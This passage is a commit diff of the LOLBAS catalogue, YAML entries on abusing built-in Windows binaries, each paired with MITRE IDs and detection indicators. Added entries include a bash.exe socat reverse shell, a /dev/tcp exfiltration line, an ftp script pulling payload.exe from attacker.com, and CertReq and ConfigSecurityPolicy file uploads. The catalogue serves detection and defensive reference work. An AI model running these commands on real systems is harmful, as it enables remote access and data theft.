mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-27 07:18:05 +01:00
commit
6e5bd0e9e1
@ -19,7 +19,7 @@ Code_Sample:
|
|||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
|
||||||
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
|
- IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
|
||||||
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
|
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
|
||||||
Resources:
|
Resources:
|
||||||
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
|
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
|
||||||
|
@ -12,6 +12,22 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 10
|
OperatingSystem: Windows 10
|
||||||
|
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
|
||||||
|
Description: Executes a reverseshell
|
||||||
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
|
||||||
|
Description: Exfiltrate data
|
||||||
|
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10
|
||||||
- Command: bash.exe -c calc.exe
|
- Command: bash.exe -c calc.exe
|
||||||
Description: Executes calc.exe from bash.exe
|
Description: Executes calc.exe from bash.exe
|
||||||
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
|
||||||
@ -32,4 +48,6 @@ Resources:
|
|||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Alex Ionescu
|
- Person: Alex Ionescu
|
||||||
Handle: '@aionescu'
|
Handle: '@aionescu'
|
||||||
|
- Person: Asif Matadar
|
||||||
|
Handle: '@d1r4c'
|
||||||
---
|
---
|
36
yml/OSBinaries/Certreq.yml
Normal file
36
yml/OSBinaries/Certreq.yml
Normal file
@ -0,0 +1,36 @@
|
|||||||
|
---
|
||||||
|
Name: CertReq.exe
|
||||||
|
Description: Used for requesting and managing certificates
|
||||||
|
Author: 'David Middlehurst'
|
||||||
|
Created: '2020-07-07'
|
||||||
|
Commands:
|
||||||
|
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
|
||||||
|
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
|
||||||
|
Usecase: Download file from Internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
|
||||||
|
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
|
||||||
|
Usecase: Upload
|
||||||
|
Category: Upload
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\System32\certreq.exe
|
||||||
|
- Path: C:\Windows\SysWOW64\certreq.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: certreq creates new files
|
||||||
|
- IOC: certreq makes POST requests
|
||||||
|
Resources:
|
||||||
|
- Link: https://dtm.uk/certreq
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: David Middlehurst
|
||||||
|
Handle: '@dtmsecurity'
|
||||||
|
---
|
@ -25,8 +25,8 @@ Commands:
|
|||||||
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
|
||||||
Category: ADS
|
Category: ADS
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1096
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/techniques/T1096
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
- Command: certutil -encode inputFileName encodedOutputFileName
|
- Command: certutil -encode inputFileName encodedOutputFileName
|
||||||
Description: Command to encode a file using Base64
|
Description: Command to encode a file using Base64
|
||||||
@ -44,6 +44,14 @@ Commands:
|
|||||||
MitreID: T1140
|
MitreID: T1140
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
|
||||||
|
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
|
||||||
|
Usecase: Decode files to evade defensive measures
|
||||||
|
Category: Decode
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1140
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\certutil.exe
|
- Path: C:\Windows\System32\certutil.exe
|
||||||
- Path: C:\Windows\SysWOW64\certutil.exe
|
- Path: C:\Windows\SysWOW64\certutil.exe
|
||||||
@ -64,4 +72,5 @@ Acknowledgement:
|
|||||||
Handle: '@Moriarty_Meng'
|
Handle: '@Moriarty_Meng'
|
||||||
- Person: egre55
|
- Person: egre55
|
||||||
Handle: '@egre55'
|
Handle: '@egre55'
|
||||||
|
- Person: Lior Adar
|
||||||
---
|
---
|
||||||
|
32
yml/OSBinaries/ConfigSecurityPolicy.yml
Normal file
32
yml/OSBinaries/ConfigSecurityPolicy.yml
Normal file
@ -0,0 +1,32 @@
|
|||||||
|
---
|
||||||
|
Name: ConfigSecurityPolicy.exe
|
||||||
|
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
|
||||||
|
Author: 'Ialle Teixeira'
|
||||||
|
Created: '04/09/2020'
|
||||||
|
Commands:
|
||||||
|
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
|
||||||
|
Description: Upload file, credentials or data exfiltration in general
|
||||||
|
Usecase: Upload file
|
||||||
|
Category: Upload
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1567
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1567/
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
|
||||||
|
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
|
||||||
|
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
|
||||||
|
- IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
|
||||||
|
Resources:
|
||||||
|
- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
|
||||||
|
- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
|
||||||
|
- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
|
||||||
|
- Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Ialle Teixeira
|
||||||
|
Handle: '@NtSetDefault'
|
||||||
|
---
|
27
yml/OSBinaries/Desktopimgdownldr.yml
Normal file
27
yml/OSBinaries/Desktopimgdownldr.yml
Normal file
@ -0,0 +1,27 @@
|
|||||||
|
---
|
||||||
|
Name: Desktopimgdownldr.exe
|
||||||
|
Description: Windows binary used to configure lockscreen/desktop image
|
||||||
|
Author: Gal Kristal
|
||||||
|
Created: 28/06/2020
|
||||||
|
Commands:
|
||||||
|
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
|
||||||
|
Description: Downloads the file and sets it as the computer's lockscreen
|
||||||
|
Usecase: Download arbitrary files from a web server
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\desktopimgdownldr.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: desktopimgdownldr.exe that creates non-image file
|
||||||
|
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
|
||||||
|
Resources:
|
||||||
|
- Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Gal Kristal
|
||||||
|
Handle: '@gal_kristal'
|
||||||
|
---
|
38
yml/OSBinaries/Diantz.yml
Normal file
38
yml/OSBinaries/Diantz.yml
Normal file
@ -0,0 +1,38 @@
|
|||||||
|
---
|
||||||
|
Name: Diantz.exe
|
||||||
|
Description: Binary that package existing files into a cabinet (.cab) file
|
||||||
|
Author: 'Tamir Yehuda'
|
||||||
|
Created: '08/08/2020'
|
||||||
|
Commands:
|
||||||
|
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
|
||||||
|
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
|
||||||
|
Usecase: Hide data compressed into an Alternate Data Stream.
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1096
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||||
|
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
|
||||||
|
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
|
||||||
|
Description: Download and compress a remote file and store it in a cab file on local machine.
|
||||||
|
Usecase: Download and compress into a cab file.
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\diantz.exe
|
||||||
|
- Path: c:\windows\syswow64\diantz.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: diantz storing data into alternate data streams.
|
||||||
|
- IOC: diantz getting a file from a remote machine or the internet.
|
||||||
|
Resources:
|
||||||
|
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Tamir Yehuda
|
||||||
|
Handle: '@tim8288'
|
||||||
|
- Person: Hai Vaknin
|
||||||
|
Handle: '@vakninhai'
|
||||||
|
---
|
39
yml/OSBinaries/Explorer.yml
Normal file
39
yml/OSBinaries/Explorer.yml
Normal file
@ -0,0 +1,39 @@
|
|||||||
|
---
|
||||||
|
Name: Explorer.exe
|
||||||
|
Description: Binary used for managing files and system components within Windows
|
||||||
|
Author: 'Jai Minton'
|
||||||
|
Created: '2020-06-24'
|
||||||
|
Commands:
|
||||||
|
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
|
||||||
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
|
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: explorer.exe C:\Windows\System32\notepad.exe
|
||||||
|
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
|
||||||
|
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
|
||||||
|
Category: Execute
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1218
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
|
OperatingSystem: Windows 10 (Tested)
|
||||||
|
Full_Path:
|
||||||
|
- Path: C:\Windows\explorer.exe
|
||||||
|
- Path: C:\Windows\SysWOW64\explorer.exe
|
||||||
|
Code_Sample:
|
||||||
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
|
||||||
|
Resources:
|
||||||
|
- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
|
||||||
|
- Link: https://twitter.com/bohops/status/1276356245541335048
|
||||||
|
- Link: https://twitter.com/bohops/status/986984122563391488
|
||||||
|
Acknowledgement:
|
||||||
|
- Person: Jai Minton
|
||||||
|
Handle: '@CyberRaiju'
|
||||||
|
- Person: Jimmy
|
||||||
|
Handle: '@bohops'
|
||||||
|
---
|
@ -28,6 +28,14 @@ Commands:
|
|||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
|
||||||
|
Description: Command for copying calc.exe to another folder
|
||||||
|
Usecase: Copy file
|
||||||
|
Category: Copy
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\extrac32.exe
|
- Path: C:\Windows\System32\extrac32.exe
|
||||||
- Path: C:\Windows\SysWOW64\extrac32.exe
|
- Path: C:\Windows\SysWOW64\extrac32.exe
|
||||||
@ -44,4 +52,8 @@ Acknowledgement:
|
|||||||
Handle: '@egre55'
|
Handle: '@egre55'
|
||||||
- Person: Oddvar Moe
|
- Person: Oddvar Moe
|
||||||
Handle: '@oddvarmoe'
|
Handle: '@oddvarmoe'
|
||||||
|
- Person: Hai Vaknin(Lux
|
||||||
|
Handle: '@VakninHai'
|
||||||
|
- Person: Tamir Yehuda
|
||||||
|
Handle: '@tim8288'
|
||||||
---
|
---
|
@ -12,6 +12,14 @@ Commands:
|
|||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
|
||||||
|
Description: Download
|
||||||
|
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||||
|
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\ftp.exe
|
- Path: C:\Windows\System32\ftp.exe
|
||||||
- Path: C:\Windows\SysWOW64\ftp.exe
|
- Path: C:\Windows\SysWOW64\ftp.exe
|
||||||
@ -23,6 +31,7 @@ Resources:
|
|||||||
- Link: https://twitter.com/0xAmit/status/1070063130636640256
|
- Link: https://twitter.com/0xAmit/status/1070063130636640256
|
||||||
- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
|
- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
|
||||||
- Link: https://ss64.com/nt/ftp.html
|
- Link: https://ss64.com/nt/ftp.html
|
||||||
|
- Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
|
179
yml/OSBinaries/GfxDownloadWrapper.yml
Normal file
179
yml/OSBinaries/GfxDownloadWrapper.yml
Normal file
@ -0,0 +1,179 @@
|
|||||||
|
---
|
||||||
|
Name: GfxDownloadWrapper.exe
|
||||||
|
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
|
||||||
|
Author: Jesus Galvez
|
||||||
|
Created: Jesus Galvez
|
||||||
|
Commands:
|
||||||
|
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
|
||||||
|
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
|
||||||
|
Usecase: Download file from internet
|
||||||
|
Category: Download
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1105
|
||||||
|
MitreLink: https://attack.mitre.org/techniques/T1105/
|
||||||
|
OperatingSystem: Windows 10
|
||||||
|
Full_Path:
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\
|
||||||
|
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\
|
||||||
|
